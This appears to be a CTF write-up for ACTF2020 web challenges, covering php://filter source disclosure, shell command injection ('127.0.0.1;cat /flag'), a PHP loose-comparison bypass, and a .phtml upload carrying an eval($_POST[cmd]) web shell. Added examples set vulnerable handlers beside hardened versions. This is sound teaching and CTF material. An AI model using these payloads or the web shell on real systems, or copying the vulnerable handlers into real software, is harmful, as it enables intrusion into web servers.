
ACTF2020 challenge writeups

 1 year ago
source link: https://sunny250.github.io/2020/04/26/ACTF%E5%88%B7%E9%A2%982020/

Include

A simple PHP stream-wrapper (pseudo-protocol) file inclusion.

?file=php://filter/convert.base64-encode/resource=flag.php

Because include() honours PHP stream wrappers, reading flag.php through php://filter with convert.base64-encode returns the file as base64 text instead of executing it. Base64-decoding the response gives the source of flag.php, comment included:

echo "Can you find out the flag?";
//flag{9dc5b2d8-37cf-45a6-b5a3-68b3d5c6c2e5}
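The handler behind this challenge is not shown in the writeup. The following is an added example, not the challenge's own code: a minimal include handler in the same shape, first as typically written and then hardened with an allowlist, plus the decoding step an attacker performs on the leaked output. The parameter name file, the page names and the sample response body are assumptions made for illustration.

```php
<?php
// Added example (not from the original writeup). Parameter name "file", the
// allowed page names and the sample body below are assumptions.

// Vulnerable: the raw parameter reaches include(), so stream wrappers are honoured.
// ?file=flag.php executes flag.php and shows only its echo output, whereas
// ?file=php://filter/convert.base64-encode/resource=flag.php makes include() read the
// file through the base64 filter; the result contains no "<?php" tag, so PHP emits it
// as plain text and the client can decode it back into the full source.
function include_vulnerable(array $get): void
{
    include $get['file'];
}

// Hardened: the client chooses a key, the server chooses the path. Wrappers
// (php://, data://, ...) and traversal (../) can never reach include().
function include_hardened(array $get, string $baseDir): void
{
    $allowed = ['index' => 'index.php', 'about' => 'about.php'];
    $page = $get['file'] ?? 'index';
    if (!array_key_exists($page, $allowed)) {
        http_response_code(404);
        exit('no such page');
    }
    include $baseDir . DIRECTORY_SEPARATOR . $allowed[$page];
}

// Attacker side: pick the base64 blob out of the response body and decode it
// with strict mode so HTML or whitespace around it does not corrupt the result.
function recover_source(string $body): string
{
    if (!preg_match('/[A-Za-z0-9+\/=]{16,}/', $body, $m)) {
        return '';
    }
    $decoded = base64_decode($m[0], true);
    return $decoded === false ? '' : $decoded;
}

// Constructed sample of what the filter wrapper returns for a small flag.php.
$body = base64_encode("<?php\necho \"Can you find out the flag?\";\n//flag{placeholder}\n");
echo recover_source($body);
```

Run it with php on the command line to see the decoding step; the two handlers are only defined, not invoked, because they expect a web request.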

No input filtering is applied, so this one comes down to a Linux basic: how to run several commands in a single shell line. Chain them with &&, separate them with a semicolon ;, or use the pipe |.

Here, though, only | and ; worked (not sure why). A plausible explanation: the right-hand side of && runs only when the left-hand command exits 0, so if the first command fails inside the sandbox, the chained command is skipped, whereas ; and | run it regardless of the first command's exit status.

Payload:

127.0.0.1 | cat /flag
or
127.0.0.1;cat /flag
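The challenge source is not in the writeup, so what follows is an added example, not the challenge's code: a ping handler in the shape the payload above implies, vulnerable and then hardened, with a small helper that flags shell metacharacters. The parameter name target is an assumption.

```php
<?php
// Added example (not the challenge's code). The "target" parameter is assumed.

// Vulnerable: the user string is spliced into a shell command line, so any shell
// metacharacter (; | && ` $( ) newline) ends the ping command and starts the
// attacker's. This is exactly what "127.0.0.1;cat /flag" exploits.
function ping_vulnerable(string $target): void
{
    system('ping -c 1 ' . $target);
}

// True when the input contains characters the shell would interpret. Useful for
// logging and alerting on injection attempts, not as the only defence.
function has_shell_metachar(string $s): bool
{
    return preg_match('/[;&|`$(){}<>\n\r\'"\\\\ ]/', $s) === 1;
}

// Hardened: accept only a syntactically valid IP address or a strictly formed
// hostname, then still quote the argument so the shell sees exactly one word.
function ping_hardened(string $target): void
{
    $isIp = filter_var($target, FILTER_VALIDATE_IP) !== false;
    $isHost = preg_match(
        '/^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$/',
        $target
    ) === 1;
    if (!$isIp && !$isHost) {
        http_response_code(400);
        exit('invalid target');
    }
    system('ping -c 1 ' . escapeshellarg($target));
}

// Constructed inputs: the legitimate case and the three chaining forms discussed
// above. Only the first survives both checks.
foreach (['127.0.0.1', '127.0.0.1;cat /flag', '127.0.0.1 | cat /flag', '127.0.0.1 && cat /flag'] as $t) {
    printf("%-24s metachar=%-3s valid_ip=%s\n", $t,
        has_shell_metachar($t) ? 'yes' : 'no',
        filter_var($t, FILTER_VALIDATE_IP) !== false ? 'yes' : 'no');
}
```

escapeshellarg() alone would already neutralise the payloads above, but validating the value first means a bad input is rejected with a 400 rather than passed to ping as a strange single argument.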

BackupFile

A directory scan turns up a backup file:

sunny250@kali ~ # dirb http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/ ~/web/dictionaries/CTFwebdir.txt 

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Apr 26 13:01:43 2020
URL_BASE: http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/
WORDLIST_FILES: /Users/sx/web/dictionaries/CTFwebdir.txt

-----------------

GENERATED WORDS: 53

---- Scanning URL: http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/ ----
+ http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/index.php.bak (CODE:200|SIZE:347)
+ http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/flag.php (CODE:200|SIZE:0)

-----------------
END_TIME: Sun Apr 26 13:01:46 2020
DOWNLOADED: 53 - FOUND: 2

Fetching index.php.bak gives the source:

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

When == compares operands of different types, PHP converts them before comparing. Before PHP 8, an integer compared with a string converts the string to a number: the leading digits of "123ffw..." become 123, so 123 == $str is true. Note that PHP 8 changed this rule: a non-numeric string is now compared as a string against the integer cast to "123", which is not equal to "123ffw...", so this bypass only works on PHP 7 and earlier.

Reference article

The intval function

So key=123 is enough.
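The following added example (not part of the writeup) walks the challenge's check step by step for several inputs, shows where the PHP 7 and PHP 8 semantics diverge, and gives the comparison the code should have used. The sample keys are constructed.

```php
<?php
// Added example, not the challenge's code. $str is the constant from index.php.bak;
// the sample keys are constructed for illustration.

$str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";

// Same logic as index.php.bak: is_numeric gate, intval, then loose comparison.
function check_vulnerable(string $key, string $str): bool
{
    if (!is_numeric($key)) {   // "123" and "0123" pass; "123abc" and "abc" do not
        return false;
    }
    $n = intval($key);          // "0123" -> 123 (base 10, leading zero ignored)
    return $n == $str;          // int vs string: conversion rules decide the result
}

// Hardened: a strict, constant-time string comparison. No type juggling,
// so no value other than the exact secret string can ever match.
function check_hardened(string $key, string $str): bool
{
    return hash_equals($str, $key);
}

foreach (['123', '0123', '123abc', 'abc'] as $k) {
    printf("key=%-7s is_numeric=%-5s intval=%-4d vulnerable=%-5s hardened=%s\n",
        $k,
        is_numeric($k) ? 'true' : 'false',
        intval($k),
        check_vulnerable($k, $str) ? 'true' : 'false',
        check_hardened($k, $str) ? 'true' : 'false');
}

// PHP 7: 123 == "123ffw..." converts the leading-numeric string to 123 -> true,
//        so both "123" and "0123" unlock the flag.
// PHP 8: "123ffw..." is non-numeric, so the int is cast to "123" and compared as a
//        string -> false; the bypass no longer works.
echo PHP_VERSION_ID >= 80000
    ? "running on PHP 8+: loose int/string comparison is string-based\n"
    : "running on PHP 7 or earlier: loose int/string comparison is numeric\n";
```

The hardened version also removes the is_numeric and intval steps entirely; they exist only to make the comparison look restricted while still feeding a lossy conversion into ==.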

Upload

The challenge page shows a light bulb; hovering over it reveals an upload form.

Uploading 1.php directly is rejected. Trying other extensions shows that .phtml is accepted:

POST / HTTP/1.1
Host: 32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380150826415384369013004740571
Content-Length: 406
Origin: http://32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn
Connection: close
Referer: http://32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn/
Upgrade-Insecure-Requests: 1

-----------------------------380150826415384369013004740571
Content-Disposition: form-data; name="upload_file"; filename="1.phtml"
Content-Type: image/gif

GIF89a
<script language="php">
eval($_POST[cmd]);
</script>
-----------------------------380150826415384369013004740571
Content-Disposition: form-data; name="submit"

upload
-----------------------------380150826415384369013004740571--

The response gives the upload path; connect to it with AntSword (蚁剑) and grab the flag. Two details make this payload work and are worth checking on any other target: .phtml executes only if the web server maps it to the PHP handler (Debian and Ubuntu's Apache PHP module configuration matches .php, .phtml and .phar), and the <script language="php"> tag form was removed in PHP 7.0, so on a PHP 7+ target the body must use <?php eval($_POST['cmd']); ?> instead (with the index quoted, since a bare cmd is an undefined constant and throws an Error on PHP 8).
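The upload handler itself is not shown in the writeup. As an added example, not the challenge's code, here is a blocklist-style extension check of the kind that lets 1.phtml through, next to an allowlist check that also confirms the content and stores the file under a server-chosen name. The field name upload_file matches the request above; the upload directory and the sample file names are assumptions.

```php
<?php
// Added example (not the challenge's source). The upload directory and the
// sample names are assumptions; "upload_file" is the field name used above.

// Weak: reject a few known-bad extensions. Anything not listed (.phtml, .phar,
// .php5, ...) passes, and whether it then executes depends solely on the web
// server's handler mapping, which the application does not control.
function extension_blocklisted(string $name): bool
{
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, ['php', 'php3', 'php4'], true);
}

// Strong: accept only image extensions, sanity-check the content, and store
// under a random name so the client never chooses the extension on disk.
// getimagesize() reads the header only: the "GIF89a" prefix in the request above
// satisfies it, so the real protection is the extension allowlist plus a storage
// directory with no script handler, not the content check.
function store_image_hardened(string $tmpPath, string $clientName, string $dir): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    $allowed = ['jpg' => IMAGETYPE_JPEG, 'jpeg' => IMAGETYPE_JPEG,
                'png' => IMAGETYPE_PNG, 'gif' => IMAGETYPE_GIF];
    if (!isset($allowed[$ext])) {
        return null;
    }
    $info = @getimagesize($tmpPath);
    if ($info === false || $info[2] !== $allowed[$ext]) {
        return null;
    }
    $stored = $dir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($tmpPath, $stored) ? $stored : null;
}

// Typical use inside the form handler (not run from the command line):
// $path = store_image_hardened($_FILES['upload_file']['tmp_name'],
//                              $_FILES['upload_file']['name'], '/var/www/uploads');

// Constructed names showing what the blocklist misses.
foreach (['1.php', '1.phtml', '1.PHP', '1.php.jpg', 'shell.phar'] as $n) {
    printf("%-11s blocklisted=%s\n", $n, extension_blocklisted($n) ? 'yes' : 'no');
}
```

Of the five names, only 1.php and 1.PHP are caught by the blocklist; 1.phtml and shell.phar sail through, which is the bypass used above.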

